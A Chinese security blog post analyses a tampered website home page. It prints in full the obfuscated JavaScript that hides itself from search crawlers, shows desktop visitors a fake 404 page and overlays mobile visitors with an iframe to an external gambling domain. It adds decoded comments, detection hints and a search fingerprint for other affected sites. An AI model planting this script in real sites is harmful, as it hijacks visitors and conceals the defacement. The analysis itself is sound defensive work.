前言
因最近工作需求,需要对一些备案网站进行监测,寻找其存在的漏洞,例如主页篡改,挂暗链,弱口令等。在此期间发现一个有趣的案例,前来分享。
发现
这个发现其实也是蛮巧合的,大家先看一下这个首页
很神奇,一打开就提示 404 not found,但是标题又显示“官网-官方网”,明显这个有猫腻。
正常来说,返回 404 的页面标题多数也会是 404;查看源代码后发现了恶意 JS。
进一步分析
// Cloaking / defacement script recovered from a tampered home page. The hex
// escapes are decoded in the trailing comments on each line; identifiers are
// random (EhaqDJ1, kJZGUYvdz2, auz3, ETJ4) and carry no meaning.
// Flow as visible below: do nothing when the User-Agent matches the crawler
// regex; otherwise choose a target URL from a mobile-UA regex, then overlay the
// page with a full-screen iframe pointing at that URL.
// Detection hints grounded in this listing: the `.yabo` class name, the
// z-index 9999999999 overlay CSS, and an iframe whose src is either the external
// domain or /404.html. Because crawlers are excluded, a monitor must fetch with a
// non-spider (ideally mobile) User-Agent to observe the injected content.
var EhaqDJ1 =
/(Baiduspider|360Spider|YisouSpider|YandexBot|Sogou inst spider|Sogou web spider|spider)/i;
// Gate 1: negated crawler test — search engines fall outside this branch and see
// the page untouched, so the tampering stays out of search-result previews.
if (!EhaqDJ1[\"\\x74\\x65\\x73\\x74\"](navigator[ //test
\"\\x75\\x73\\x65\\x72\\x41\\x67\\x65\\x6e\\x74\"])) { //userAgent
// Gate 2: mobile-device UA match; `flag` is the match result (truthy on mobile).
let flag = navigator[\"\\x75\\x73\\x65\\x72\\x41\\x67\\x65\\x6e\\x74\"][ //userAgent
\"\\x6d\\x61\\x74\\x63\\x68\" //match
](
/(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i
);
// `_0` is the iframe target. It is assigned without var/let/const, so it is an
// implicit global — a cheap artifact to look for when triaging a page.
if (flag) {
_0 =
\'\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x65\\x72\\x2d\\x73\\x63\\x61\\x6c\\x61\\x62\\x6c\\x65\\x30\\x37\\x2e\\x74\\x6f\\x70\' //https://user-scalable07.top
} else {
// Desktop visitors get the site's own /404.html framed over the real page.
_0 = \'\\x2f\\x34\\x30\\x34\\x2e\\x68\\x74\\x6d\\x6c\' ///404.html
}
// document.write() of IE-compat and viewport meta tags so the overlay renders
// edge-to-edge on mobile.
window[\"\\x64\\x6f\\x63\\x75\\x6d\\x65\\x6e\\x74\"][\"\\x77\\x72\\x69\\x74\\x65\"]( //document write
\'\\x3c\\x6d\\x65\\x74\\x61 \\x68\\x74\\x74\\x70\\x2d\\x65\\x71\\x75\\x69\\x76\\x3d\\x58\\x2d\\x55\\x41\\x2d\\x43\\x6f\\x6d\\x70\\x61\\x74\\x69\\x62\\x6c\\x65 \\x63\\x6f\\x6e\\x74\\x65\\x6e\\x74\\x3d\\x22\\x49\\x45\\x3d\\x65\\x64\\x67\\x65\\x22\\x3e\\x3c\\x6d\\x65\\x74\\x61 \\x6e\\x61\\x6d\\x65\\x3d\\x76\\x69\\x65\\x77\\x70\\x6f\\x72\\x74 \\x63\\x6f\\x6e\\x74\\x65\\x6e\\x74\\x3d\\x22\\x77\\x69\\x64\\x74\\x68\\x3d\\x64\\x65\\x76\\x69\\x63\\x65\\x2d\\x77\\x69\\x64\\x74\\x68\\x2c\\x69\\x6e\\x69\\x74\\x69\\x61\\x6c\\x2d\\x73\\x63\\x61\\x6c\\x65\\x3d\\x31\\x22\\x3e\' //<meta http-equiv=X-UA-Compatible content=\"IE=edge\"><meta name=viewport content=\"width=device-width,initial-scale=1\">
);
// kJZGUYvdz2 = document.head; auz3 = a <style> element; ETJ4 = a <div> element.
var kJZGUYvdz2 = window[\"\\x64\\x6f\\x63\\x75\\x6d\\x65\\x6e\\x74\"][ //document
\"\\x68\\x65\\x61\\x64\" //head
];
var auz3 = window[\"\\x64\\x6f\\x63\\x75\\x6d\\x65\\x6e\\x74\"][ //document
\"\\x63\\x72\\x65\\x61\\x74\\x65\\x45\\x6c\\x65\\x6d\\x65\\x6e\\x74\" //createElement
](\'\\x73\\x74\\x79\\x6c\\x65\'), //style
ETJ4 = window[\"\\x64\\x6f\\x63\\x75\\x6d\\x65\\x6e\\x74\"][ //document
\"\\x63\\x72\\x65\\x61\\x74\\x65\\x45\\x6c\\x65\\x6d\\x65\\x6e\\x74\" //createElement
](\'\\x64\\x69\\x76\'); //div
// CSS that locks html/body (overflow:hidden) and pins `.yabo` as a fixed,
// full-height, white, top-most layer — the original page stays in the DOM
// underneath, which is why "view source" still shows the legitimate markup.
auz3[\"\\x69\\x6e\\x6e\\x65\\x72\\x48\\x54\\x4d\\x4c\"] = //innerHTML
\'\\x68\\x74\\x6d\\x6c\\x2c\\x62\\x6f\\x64\\x79\\x7b\\x70\\x6f\\x73\\x69\\x74\\x69\\x6f\\x6e\\x3a\\x72\\x65\\x6c\\x61\\x74\\x69\\x76\\x65\\x3b\\x77\\x69\\x64\\x74\\x68\\x3a\\x61\\x75\\x74\\x6f \\x21\\x69\\x6d\\x70\\x6f\\x72\\x74\\x61\\x6e\\x74\\x3b\\x68\\x65\\x69\\x67\\x68\\x74\\x3a\\x31\\x30\\x30\\x25 \\x21\\x69\\x6d\\x70\\x6f\\x72\\x74\\x61\\x6e\\x74\\x3b\\x6d\\x69\\x6e\\x2d\\x77\\x69\\x64\\x74\\x68\\x3a\\x61\\x75\\x74\\x6f \\x21\\x69\\x6d\\x70\\x6f\\x72\\x74\\x61\\x6e\\x74\\x3b\\x6f\\x76\\x65\\x72\\x66\\x6c\\x6f\\x77\\x3a\\x68\\x69\\x64\\x64\\x65\\x6e\\x3b\\x7d\\x2e\\x79\\x61\\x62\\x6f\\x7b\\x70\\x6f\\x73\\x69\\x74\\x69\\x6f\\x6e\\x3a\\x66\\x69\\x78\\x65\\x64\\x3b\\x74\\x6f\\x70\\x3a\\x30\\x3b\\x6c\\x65\\x66\\x74\\x3a\\x30\\x3b\\x72\\x69\\x67\\x68\\x74\\x3a\\x30\\x3b\\x68\\x65\\x69\\x67\\x68\\x74\\x3a\\x31\\x30\\x30\\x25\\x3b\\x7a\\x2d\\x69\\x6e\\x64\\x65\\x78\\x3a\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x3b\\x62\\x61\\x63\\x6b\\x67\\x72\\x6f\\x75\\x6e\\x64\\x3a\\x23\\x66\\x66\\x66\\x3b\\x7d\';
//html,body{position:relative;width:auto!important;height:100%!important;min-width:auto!important;overflow:hidden;}.yabo{position:fixed;top:0;left:0;right:0;height:100%;z-index:9999999999;background:#fff;}
// The div gets class "yabo" and is filled with a full-screen iframe whose src is
// the `_0` chosen above (note the src attribute value is written unquoted).
ETJ4[\"\\x73\\x65\\x74\\x41\\x74\\x74\\x72\\x69\\x62\\x75\\x74\\x65\"]( //setAttribute
\'\\x63\\x6c\\x61\\x73\\x73\', \'\\x79\\x61\\x62\\x6f\'); //class yabo
ETJ4[\"\\x69\\x6e\\x6e\\x65\\x72\\x48\\x54\\x4d\\x4c\"] = //innerHTML
\'\\x3c\\x69\\x66\\x72\\x61\\x6d\\x65 \\x73\\x72\\x63\\x3d\' + _0 + // <iframe src=
\' \\x66\\x72\\x61\\x6d\\x65\\x62\\x6f\\x72\\x64\\x65\\x72\\x3d\\x22\\x30\\x22 \\x73\\x74\\x79\\x6c\\x65\\x3d\\x22\\x70\\x6f\\x73\\x69\\x74\\x69\\x6f\\x6e\\x3a\\x66\\x69\\x78\\x65\\x64\\x3b\\x74\\x6f\\x70\\x3a\\x30\\x3b\\x6c\\x65\\x66\\x74\\x3a\\x30\\x3b\\x77\\x69\\x64\\x74\\x68\\x3a\\x31\\x30\\x30\\x25 \\x21\\x69\\x6d\\x70\\x6f\\x72\\x74\\x61\\x6e\\x74\\x3b\\x68\\x65\\x69\\x67\\x68\\x74\\x3a\\x31\\x30\\x30\\x25 \\x21\\x69\\x6d\\x70\\x6f\\x72\\x74\\x61\\x6e\\x74\\x3b\\x6d\\x61\\x78\\x2d\\x68\\x65\\x69\\x67\\x68\\x74\\x3a \\x6e\\x6f\\x6e\\x65 \\x21\\x69\\x6d\\x70\\x6f\\x72\\x74\\x61\\x6e\\x74\\x3b\\x22\\x3e\\x3c\\x2f\\x69\\x66\\x72\\x61\\x6d\\x65\\x3e\';
//frameborder=\"0\"style=\"position:fixed;top:0;left:0;width:100%!important;height:100%!important;max-height:none!important;\"></iframe>
// The <style> goes into <head>; the overlay div is appended to head.parentNode
// (the <html> element), i.e. outside <body>, so a body-only scan misses it.
kJZGUYvdz2[\"\\x61\\x70\\x70\\x65\\x6e\\x64\\x43\\x68\\x69\\x6c\\x64\"](auz3); //appendChild
kJZGUYvdz2[\"\\x70\\x61\\x72\\x65\\x6e\\x74\\x4e\\x6f\\x64\\x65\"][ //parentNode
\"\\x61\\x70\\x70\\x65\\x6e\\x64\\x43\\x68\\x69\\x6c\\x64\" //appendChild
](ETJ4)
}
不难看出,脚本先排除搜索引擎爬虫的 UA,再判断访问端:如果是 PC 访问,就提示 404;如果是手机访问,就跳转到博彩网页,方便用户下载 APP。代码中主要是对网页标签进行修改,按照 XSS 注入的分类来说,类似于 DOM 型注入(主要看 innerHTML)。
扩大搜索
基本上到这里就可以判断是首页被篡改,再通过恶意 JS 跳转。
接着搜索了一波,发现这个现象好像不止一个,
这些站点都和上面一样,PC 访问提示 404;最主要的是看时间还是最新的,意思就是这个篡改还在持续。
fofa 搜索指纹:js_name="/gz/gz.js"
只能说真的是有点厉害
结尾
遇到首页被篡改,多数情况下需要排查网站是否存在弱口令、任意文件上传、命令执行等漏洞;从这个案例可以看出来,这基本上是全网批量扫描后再批量上线实现的。
对此,咱们只能修改弱口令,及时更新漏洞补丁,注意网站安全。
THE END